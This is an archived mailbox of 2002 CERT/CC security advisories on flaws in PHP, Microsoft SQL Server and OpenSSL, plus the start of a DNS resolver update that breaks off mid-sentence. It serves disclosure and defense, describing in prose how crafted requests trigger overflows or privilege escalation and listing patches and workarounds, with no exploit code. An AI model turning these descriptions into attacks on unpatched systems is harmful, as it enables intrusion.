X-UIDL: 435 Status: RO X-Status: X-Keywords: X-UID: 56 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-21 Vulnerability in PHP Original release date: July 22, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running PHP versions 4.2.0 or 4.2.1 Overview A vulnerability has been discovered in PHP. This vulnerability could be used by a remote attacker to execute arbitrary code or crash PHP and/or the web server. I. Description PHP is a popular scripting language in widespread use. For more information about PHP, see http://www.php.net/manual/en/faq.general.php The vulnerability occurs in the portion of PHP code responsible for handling file uploads, specifically multipart/form-data. By sending a specially crafted POST request to the web server, an attacker can corrupt the internal data structures used by PHP. Specifically, an intruder can cause an improperly initialized memory structure to be freed. In most cases, an intruder can use this flaw to crash PHP or the web server. Under some circumstances, an intruder may be able to take advantage of this flaw to execute arbitrary code with the privileges of the web server. You may be aware that freeing memory at inappropriate times in some implementations of malloc and free does not usually result in the execution of arbitrary code. However, because PHP utilizes its own memory management system, the implementation of malloc and free is irrelevant to this problem. Stefan Esser of e-matters GmbH has indicated that intruders cannot execute code on x86 systems. However, we encourage system administrators to apply patches on x86 systems as well to guard against denial-of-service attacks and as-yet-unknown attack techniques that may permit the execution of code on x86 architectures. This vulnerability was discovered by e-matters GmbH and is described in detail in their advisory. The PHP Group has also issued an advisory. A list of vendors contacted by the CERT/CC and their status regarding this vulnerability is available in VU#929115. Although this vulnerability only affects PHP 4.2.0 and 4.2.1, e-matters GmbH has previously identified vulnerabilities in older versions of PHP. If you are running older versions of PHP, we encourage you to review http://security.e-matters.de/advisories/012002.html II. Impact A remote attacker can execute arbitrary code on a vulnerable system. An attacker may not be able to execute code on x86 architectures due to the way the stack is structured. However, an attacker can leverage this vulnerability to crash PHP and/or the web server running on an x86 architecture. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Please contact your vendor directly. Upgrade to the latest version of PHP If a patch is not available from your vendor, upgrade to version 4.2.2. Deny POST requests Until patches or an update can be applied, you may wish to deny POST requests. The following workaround is taken from the PHP Security Advisory: If the PHP applications on an affected web server do not rely on HTTP POST input from user agents, it is often possible to deny POST requests on the web server. In the Apache web server, for example, this is possible with the following code included in the main configuration file or a top-level .htaccess file: Order deny,allow Deny from all Note that an existing configuration and/or .htaccess file may have parameters contradicting the example given above. Disable vulnerable service Until you can upgrade or apply patches, you may wish to disable PHP. As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. Before deciding to disable PHP, carefully consider your service requirements. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Apple Computer Inc. Mac OS X and Mac OS X Server are shipping with PHP version 4.1.2 which does not contain the vulnerability described in this alert. Caldera Caldera OpenLinux does not provide either vulnerable version (4.2.0, 4.2.1) of PHP in their products. Therefore, Caldera products are not vulnerable to this issue. Compaq Computer Corporation SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services Software Security Response Team x-ref: SSRT2300 php post requests At the time of writing this document, Compaq is currently investigating the potential impact to Compaq's released Operating System software products. As further information becomes available Compaq will provide notice of the availability of any necessary patches through standard security bulletin announcements and be available from your normal HP Services supportchannel. Cray Inc. Cray, Inc. does not supply PHP on any of its systems. Debian Debian GNU/Linux stable aka 3.0 is not vulnerable. Debian GNU/Linux testing is not vulnerable. Debian GNU/Linux unstable is vulnerable. The problem effects PHP versions 4.2.0 and 4.2.1. Woody ships an older version of PHP (4.1.2), that doesn't contain the vulnerable function. FreeBSD FreeBSD does not include any version of PHP by default, and so is not vulnerable; however, the FreeBSD Ports Collection does contain the PHP4 package. Updates to the PHP4 package are in progress and a corrected package will be available in the near future. Guardian Digital Guardian Digital has not shipped PHP 4.2.x in any versions of EnGarde, therefore we are not believed to be vulnerable at this time. Hewlett-Packard Company SOURCE: Hewlett-Packard Company Security Response Team At the time of writing this document, Hewlett Packard is currently investigating the potential impact to HP's released Operating System software products. As further information becomes available HP will provide notice of the availability of any necessary patches through standard security bulletin announcements and be available from your normal HP Services support channel. IBM IBM is not vulnerable to the above vulnerabilities in PHP. We do supply the PHP packages for AIX through the AIX Toolbox for Linux Applications. However, these packages are at 4.0.6 and also incorporate the security patch from 2/27/2002. Mandrakesoft Mandrake Linux does not ship with PHP version 4.2.x and as such is not vulnerable. The Mandrake Linux cooker does currently contain PHP 4.2.1 and will be updated shortly, but cooker should not be used in a production environment and no advisory will be issued. Microsoft Corporation Microsoft products are not affected by the issues detailed in this advisory. Network Appliance No Netapp products are vulnerable to this. Red Hat Inc. None of our commercial releases ship with vulnerable versions of PHP (4.2.0, 4.2.1). SuSE Inc. SuSE Linux is not vulnerable to this problem, as we do not ship PHP 4.2.x. _________________________________________________________________ The CERT/CC acknowledges e-matters GmbH for discovering and reporting this vulnerability. _________________________________________________________________ Author: Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-21.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History July 22, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPTyOVqCVPMXQI2HJAQGK6QQAp1rR7K18PNxpQZvqKPYWxyrtpiT8mmKN UuyERmOoX+5MAwH0hbAWCvVcyLH0gKGbTpBkRgToT8IEHZojwHCzqOaMM9kni/FG QEVeznLfBX4GIgZGPu0XWlph3ZqaayWln57eGueYZ26zBuriIUu2cUCmyYGQkqlI tuZdnDqUmR0= =+829 -----END PGP SIGNATURE----- From - Mon Jul 29 18:22:23 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g6U1Ffta030345; Mon, 29 Jul 2002 18:15:41 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.10) with SMTP id g6TMAOZ30990; Mon, 29 Jul 2002 18:10:24 -0400 Date: Mon, 29 Jul 2002 18:10:24 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-22 Multiple Vulnerabilities in Microsoft SQL Server Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 454 Status: RO X-Status: X-Keywords: X-UID: 57 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-22 Multiple Vulnerabilities in Microsoft SQL Server Original release date: July 29, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Microsoft SQL Server 7.0 * Microsoft SQL Server 2000 * Microsoft SQL Server Desktop Engine 2000 Overview The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. These vulnerabilities are public and have been addressed by Microsoft Security Bulletins, but we believe their collective severity warrants additional attention. I. Description Since December 2001, Microsoft has published eight Microsoft Security Bulletins regarding more than a dozen vulnerabilities in the Microsoft SQL Server. This document provides information on the five most serious of these vulnerabilities; references to the remainder are provided in Appendix B. In isolation, many of these vulnerabilities have significant preconditions that are difficult for an attacker to overcome. However, when exploited in combination, they allow attackers to gain additional flexibility and increase their chances for success. In particular, the privilege escalation vulnerability described in VU#796313 allows an attacker to weaken the security policy of the SQL server by granting it the same privileges as the operating system. With full administrative privileges, a compromised Microsoft SQL Server can be used to take control of the server host. The CERT/CC encourages system administrators to take this opportunity to review the security of their Microsoft SQL servers and to apply the appropriate patches from the Microsoft bulletins listed in Appendix B. VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges (CAN-2002-0642) The Microsoft SQL Server typically runs under a dedicated "service account" that is defined by system administrators at installation time. This definition is stored in the Windows registry with permissions that allow the SQL Server to change the value of the registry key. As a result, attackers with access to the "xp_regwrite" extended stored procedure can alter this registry key and cause the SQL Server to use the LocalSystem account as its service account. Upon rebooting the server host or restarting the SQL service, the SQL Server will run with the full administrative privileges of the LocalSystem account. This ability allows a remote attacker to submit SQL queries that can execute any command on the system with the privileges of the operating system. VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function (CAN-2002-0624) The Microsoft SQL Server provides multiple methods for users to authenticate to SQL databases. When SQL Server Authentication is used, the username and password of each database user is stored in a database on the SQL server. When users supply a password to the server using this method, a function named pwdencrypt() is responsible for encrypting the user-supplied password so that it can be compared to the encrypted password stored on the SQL server. There is a buffer overflow in pwdencrypt() that allows remote attackers to execute arbitrary code on the SQL server by supplying a crafted password value. Successful exploitation of this vulnerability requires knowledge of a valid username and will cause the supplied code to execute with the privileges of the SQL service account. VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows (CAN-2002-0154) Microsoft SQL Server provides a scripting construct known as an "extended stored procedure" that can execute a collection of server commands together. Several of the extended stored procedures included with the Microsoft SQL Server contain buffer overflow vulnerabilities. These procedures provide increased functionality for database applications, allowing them to access operating system or network resources. Parameters are passed to extended stored procedures via an API that specifies the actual and maximum length of various parameter data types. Some of the extended stored procedures fail to adequately validate the length of input parameters, resulting in stack buffer overflow conditions. Since some of the vulnerable procedures are configured by default to allow public access, it is possible for an unauthenticated attacker to exploit one or more of these buffer overflows. SQL Server databases are commonly used in web applications, so the vulnerable procedures may be accessible via the Internet. Microsoft Security Bulletin MS02-020 states An attacker could exploit this vulnerability in one of two ways. Firstly, the attacker could attempt to load and execute a database query that calls one of the affected functions. Secondly, if a web-site or other database front-end were configured to access and process arbitrary queries, it could be possible for the attacker to provide inputs that would cause the query to call one of the functions in question with the appropriate malformed parameters. VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service (CAN-2002-0649) The SQL Server Resolution Service (SSRS) was introduced in Microsoft SQL Server 2000 to provide referral services for multiple server instances running on the same machine. The service listens for requests on UDP port 1434 and returns the IP address and port number of the SQL server instance that provides access to the requested database. The SSRS contains a heap buffer overflow that allows unauthenticated remote attackers to execute arbitrary code by sending a crafted request to port 1434/udp. The code within such a request will be executed by the server host with the privileges of the SQL Server service account. VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service (CAN-2002-0649) The SSRS also contains a stack buffer overflow that allows unauthenticated remote attackers to execute arbitrary code by sending a crafted request to port 1434/udp. The code within such a request will be executed by the server host with the privileges of the SQL Server service account. II. Impact VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges As a precondition, this vulnerability requires the ability to modify the SQL service account registry key (for example, via the "xp_regwrite" extended stored procedure). Attackers must convince an administrator to grant this access, or they must obtain it by exploiting one of the vulnerabilities listed in this advisory. This vulnerability allows attackers to weaken the security policy of the SQL Server by elevating its privileges and causing it to run in the LocalSystem security context. As a side effect, it increases the severity of the other vulnerabilities listed in this advisory and may enable attackers to compromise the server host as well. VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function This vulnerability allows remote attackers with knowledge of a valid username to execute arbitrary code with the privileges of the SQL service account. VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows This vulnerability allows unauthenticated remote attackers to execute arbitrary code with the privileges of the SQL service account. VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service This vulnerability allows remote attackers to execute arbitrary code with the privileges of the SQL service account. VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service This vulnerability allows remote attackers to execute arbitrary code with the privileges of the SQL service account. III. Solution Apply a patch from Microsoft VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function Microsoft has published Security Bulletin MS02-034 to address these vulnerabilities. For more information, please see http://www.microsoft.com/technet/security/bulletin/MS02-034.asp VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows Microsoft has published Security Bulletin MS02-020 to address this vulnerability. For more information, please see http://www.microsoft.com/technet/security/bulletin/MS02-020.asp VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service Microsoft has published Security Bulletin MS02-039 to address these vulnerabilities. For more information, please see http://www.microsoft.com/technet/security/bulletin/MS02-039.asp Block external access to Microsoft SQL Server ports As a workaround, it is possible to limit exposure to these vulnerabilities by restricting external access to Microsoft SQL Servers on ports 1433/tcp, 1433/udp, 1434/tcp, and 1434/udp. Note that VU#399260 and VU#484891 can be exploited using UDP packets with forged source addresses that appear to belong to legitimate services, so system administrators should restrict all incoming packets sent to 1434/udp. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Appendix B. - CERT Vulnerability Notes sorted by Microsoft Security Bulletin ID This appendix contains a list of CERT Vulnerability Notes sorted in reverse chronological order by their corresponding Microsoft Security Bulletin IDs. System administrators should use this list to ensure that each of the patches listed in these bulletins have been applied. MS02-039 : Buffer Overruns in SQL Server 2000 Resolution Service Could Enable Code Execution (Q323875) VU#399260 - Microsoft SQL Server 2000 contains heap buffer overflow in SQL Server Resolution Service VU#484891 - Microsoft SQL Server 2000 contains stack buffer overflow in SQL Server Resolution Service VU#370308 - Microsoft SQL Server 2000 contains denial-of-service vulnerability in SQL Server Resolution Service MS02-038 : Unchecked Buffer in SQL Server 2000 Utilities Could Allow Code Execution (Q316333) VU#279323 - Microsoft SQL Server contains buffer overflows in several Database Consistency Checkers VU#508387 - Microsoft SQL Server contains SQL injection vulnerability in replication stored procedures MS02-035 : SQL Server Installation Process May Leave Passwords on System (Q263968) VU#338195 - Microsoft SQL Server installation process leaves sensitive information on system MS02-034 : Cumulative Patch for SQL Server (Q316333) VU#225555 - Microsoft SQL Server contains buffer overflow in pwdencrypt() function VU#682620 - Microsoft SQL Server contains buffer overflow in code used to process "BULK INSERT" queries VU#796313 - Microsoft SQL Server service account registry key has weak permissions that permit escalation of privileges MS02-030 : Unchecked Buffer in SQLXML Could Lead to Code Execution (Q321911) VU#811371 - Microsoft SQLXML ISAPI filter vulnerable to buffer overflow via contenttype parameter VU#139931 - Microsoft SQLXML HTTP components vulnerable to cross-site scripting via root parameter MS02-020 : SQL Extended Procedure Functions Contain Unchecked Buffers (Q319507) VU#627275 - Microsoft SQL Server extended stored procedures contain buffer overflows MS02-007 : SQL Server Remote Data Source Function Contain Unchecked Buffers VU#619707 - Microsoft SQL Server contains buffer overflows in openrowset and opendatasource macros MS01-060 : SQL Server Text Formatting Functions Contain Unchecked Buffers VU#700575 - Buffer overflows in Microsoft SQL Server 7.0 and SQL Server 2000 Appendix C. - References http://www.microsoft.com/technet/security/bulletin/MS02-007.asp http://www.microsoft.com/technet/security/bulletin/MS02-020.asp http://www.microsoft.com/technet/security/bulletin/MS02-030.asp http://www.microsoft.com/technet/security/bulletin/MS02-034.asp http://www.microsoft.com/technet/security/bulletin/MS02-035.asp http://www.microsoft.com/technet/security/bulletin/MS02-038.asp http://www.microsoft.com/technet/security/bulletin/MS02-039.asp http://www.microsoft.com/technet/security/bulletin/MS01-060.asp http://support.microsoft.com/support/misc/kblookup.asp?id=Q316333 http://support.microsoft.com/support/misc/kblookup.asp?id=Q319507 http://support.microsoft.com/support/misc/kblookup.asp?id=Q323875 http://www.appsecinc.com/resources/alerts/mssql/02-0000.html http://www.nextgenss.com/vna/ms-sql.txt http://www.theregister.co.uk/content/4/26086.html http://www.securityfocus.com/bid/5014 http://www.securityfocus.com/bid/5204 http://www.securityfocus.com/bid/5205 http://www.kb.cert.org/vuls/id/139931 http://www.kb.cert.org/vuls/id/225555 http://www.kb.cert.org/vuls/id/279323 http://www.kb.cert.org/vuls/id/338195 http://www.kb.cert.org/vuls/id/370308 http://www.kb.cert.org/vuls/id/399260 http://www.kb.cert.org/vuls/id/484891 http://www.kb.cert.org/vuls/id/508387 http://www.kb.cert.org/vuls/id/619707 http://www.kb.cert.org/vuls/id/627275 http://www.kb.cert.org/vuls/id/682620 http://www.kb.cert.org/vuls/id/700575 http://www.kb.cert.org/vuls/id/796313 http://www.kb.cert.org/vuls/id/811371 _________________________________________________________________ The CERT Coordination Center thanks NGSSoftware and Microsoft for their contributions to this document. _________________________________________________________________ Author: This document was written by Jeffrey P. Lanza. Your feedback is appreciated. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-22.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History Jul 29, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPUWmOqCVPMXQI2HJAQHTSAQAkzNjKa8E44TnM1L8JK+hl0kqVo5WAfGI cTaqSkE1h8jkLFugMouPNjRQgdvQj2KRQ5A1XDLl19ciylB52aDwLu3Fpive1wwx LCqBg0FpvyQC+v9ppk3W8/835Z/3D4/ZdnJPDFyiT1bpz5oZ1Lq4SBWj3+OUd9yb hZ21kTi6+n4= =JslD -----END PGP SIGNATURE----- From - Tue Jul 30 13:52:25 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g6UKjIJu020335; Tue, 30 Jul 2002 13:45:18 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.10) with SMTP id g6UHgbJ19053; Tue, 30 Jul 2002 13:42:37 -0400 Date: Tue, 30 Jul 2002 13:42:37 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 458 Status: RO X-Status: X-Keywords: X-UID: 58 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-23 Multiple Vulnerabilities In OpenSSL Original release date: July 30, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * OpenSSL prior to 0.9.6e, up to and including pre-release 0.9.7-beta2 * OpenSSL pre-release 0.9.7-beta2 and prior with Kerberos enabled * SSLeay library Overview There are four remotely exploitable buffer overflows in OpenSSL. There are also encoding problems in the ASN.1 library used by OpenSSL. Several of these vulnerabilities could be used by a remote attacker to execute arbitrary code on the target system. All could be used to create denial of service. I. Description OpenSSL is a widely deployed, open source implementation of the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The SSL and TLS protocols are used to provide a secure connection between a client and a server for higher level protocols such as HTTP. Four remotely exploitable vulnerabilities exist in many OpenSSL client and server systems. VU#102795 - OpenSSL servers contain a buffer overflow during the SSLv2 handshake process Versions of OpenSSL servers prior to 0.9.6e and pre-release version 0.9.7-beta2 contain a remotely exploitable buffer overflow vulnerability. This vulnerability can be exploited by a client using a malformed key during the handshake process with an SSL server connection. Note that only SSLv2-supported sessions are affected by this issue. This issue is also being referenced as CAN-2002-0656. VU#258555 - OpenSSL clients contain a buffer overflow during the SSLv3 handshake process OpenSSL clients using SSLv3 prior to version 0.9.6e and pre-release version 0.9.7-beta2 contain a buffer overflow vulnerability. A malicious server can exploit this by sending a large session ID to the client during the handshake process. This issue is also being referenced as CAN-2002-0656. VU#561275 - OpenSSL servers with Kerberos enabled contain a remotely exploitable buffer overflow vulnerability during the SSLv3 handshake process Servers running OpenSSL pre-release version 0.9.7 with Kerberos enabled contain a remotely exploitable buffer overflow vulnerability. This vulnerability can be exploited by a malicious client sending a malformed key during the SSLv3 handshake process with the server. This issue is also being referenced as CAN-2002-0657. VU#308891 - OpenSSL contains multiple buffers overflows in buffers that are used to hold ASCII representations of integers OpenSSL clients and servers prior to version 0.9.6e and pre-release version 0.9.7-beta2 contain multiple remotely exploitable buffer overflow vulnerabilities if running on 64-bit platforms. These buffers are used to hold ASCII representations of integers. This issue is also being referenced as CAN-2002-0655. In addition, a separate issue has been identified in OpenSSL involving malformed ASN.1 encodings. Affected components include SSL or TLS applications, as well as S/MIME, PKCS#7, and certificate creation routines. VU#748355 - ASN.1 encoding errors exist in implementations of SSL, TLS, S/MIME, PKCS#7 routines The ASN.1 library used by OpenSSL has various encoding errors that allow malformed certificate encodings to be parsed incorrectly. Exploitation of this vulnerability can lead to remote denial-of-service issues. Routines affected include those supporting SSL and TLS applications, as well as those supporting S/MIME, PKCS#7, and certificate creation. This issue is also being referenced as CAN-2002-0659. Although these vulnerabilities affect OpenSSL, other implementations of the SSL protocol that use or share a common code base may be affected. This includes implementations that are derived from the SSLeay library developed by Eric A. Young and Tim J. Hudson. As noted in the OpenSSL advisory as well, sites running OpenSSL 0.9.6d servers on 32-bit platforms with SSLv2 handshaking disabled will not be affected by any of the buffer overflows described above. However, due to the nature of the ASN.1 encoding errors, such sites may still be affected by denial-of-service situations. II. Impact By exploiting the buffer overflows above, a remote attacker can execute arbitrary code on a vulnerable server or client system or cause a denial-of-service situation. Exploitation of the ASN.1 encoding errors can lead to a denial of service. III. Solution Apply a patch from your vendor Appendix A contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below or in the individual vulnerability notes, we have not received their comments. Please contact your vendor directly. Upgrade to version 0.9.6e of OpenSSL Upgrade to version 0.9.6e of OpenSSL to resolve the issues addressed in this advisory. As noted in the OpenSSL advisory, separate patches are available: Combined patches for OpenSSL 0.9.6d: http://www.openssl.org/news/patch_20020730_0_9_6d.txt After either applying the patches above or upgrading to 0.9.6e, recompile all applications using OpenSSL to support SSL or TLS services, and restart said services or systems. This will eliminate all known vulnerable code. Sites running OpenSSL pre-release version 0.9.7-beta2 may wish to upgrade to 0.9.7-beta3, which corrects these vulnerabilities. Separate patches are available as well: Combined patches for OpenSSL 0.9.7 beta 2: http://www.openssl.org/news/patch_20020730_0_9_7.txt Disable vulnerable applications or services Until fixes for these vulnerabilities can be applied, disable all applications that use vulnerable implementations of OpenSSL. Systems with OpenSSL 0.9.7 pre-release with Kerberos enabled also need to disable Kerberos to protect against VU#561275. As a best practice, the CERT/CC recommends disabling all services that are not explicitly required. Before deciding to disable SSL or TLS, carefully consider the impact that this will have on your service requirements. Disabling SSLv2 handshaking will prevent exploitation of VU#102795. However, due to the nature of the ASN.1 encoding errors, such sites would still be vulnerable to denial-of-service attacks. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below or in the individual vulnerability notes, we have not received their comments. OpenLDAP The OpenLDAP Project uses OpenSSL. Rebuilding OpenLDAP with updated versions of OpenSSL should adequately address reported issues. Those using packaged versions of OpenLDAP should contact the package distributor for update information. OpenSSL Please see http://www.openssl.org/news/secadv_20020730.txt. Red Hat Red Hat distributes affected versions of OpenSSL in all Red Hat Linux distributions as well as the Stronghold web server. Red Hat Linux errata packages that fix the above vulnerabilities (CAN-2002-0655 and CAN-2002-0656) are available from the URL below. Users of the Red Hat Network are able to update their systems using the 'up2date' tool. A future update will fix the potential remote DOS in the ASN.1 encoding (CAN-2002-0659) http://rhn.redhat.com/errata/RHSA-2002-155.html _________________________________________________________________ These vulnerabilities were discovered and reported by the following: * VU#102795 - discovered by A.L. Digital Ltd and independently discovered and reported by John McDonald of Neohapsis * VU#258555, VU#561275, VU#308891 - discovered by A.L. Digital Ltd * VU#748355 - discovered by Adi Stav and James Yonan independently The CERT/CC thanks the OpenSSL team for the work they put into their advisory, on which this document is largely based. _________________________________________________________________ Feedback can be directed to the authors: Jason A. Rafail, Cory F. Cohen, Jeffrey S. Havrilla, Shawn V. Hernan. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2002-23.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2002 Carnegie Mellon University. Revision History July 30, 2002: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPUa3CaCVPMXQI2HJAQFfMQP+OScRIgv9wK92OnJ+2GMwSbizihkdlczk UN8NMKOw7ZB5xF6U4juvac2lYFySvAw6O0h7AkUKIubmJINtxNP+8M174S9WluDF Y2Z1BNTcIaDuM6TculYk0+abX/Z1zPt/odAj5wtq0FHAG8JlwwYMuC+iOZPUG2be pqVKVFiWAVE= =w3ZJ -----END PGP SIGNATURE----- From - Tue Aug 27 22:07:37 2002 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.3/8.12.3) with ESMTP id g7S51vVM021973; Tue, 27 Aug 2002 22:01:57 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id g7S2vNT05489; Tue, 27 Aug 2002 22:57:23 -0400 Date: Tue, 27 Aug 2002 22:57:23 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: UPDATE - CERT Advisory CA-2002-19 Buffer Overflows in Multiple DNS Resolver Libraries Precedence: bulk X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 523 Status: RO X-Status: X-Keywords: X-UID: 59 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 UPDATE: CERT Advisory CA-2002-19 Buffer Overflows in Multiple DNS Resolver Libraries August 27, 2002 An important change has been made to CERT Advisory CA-2002-19. The workaround of using a local caching DNS server is not completely effective. Specifically, some malicious DNS responses can be cached, reconstructed, and passed on to systems that may have vulnerable DNS resolver libraries. For the most current information, including which systems are affected and vendor statements, please see the documents listed at 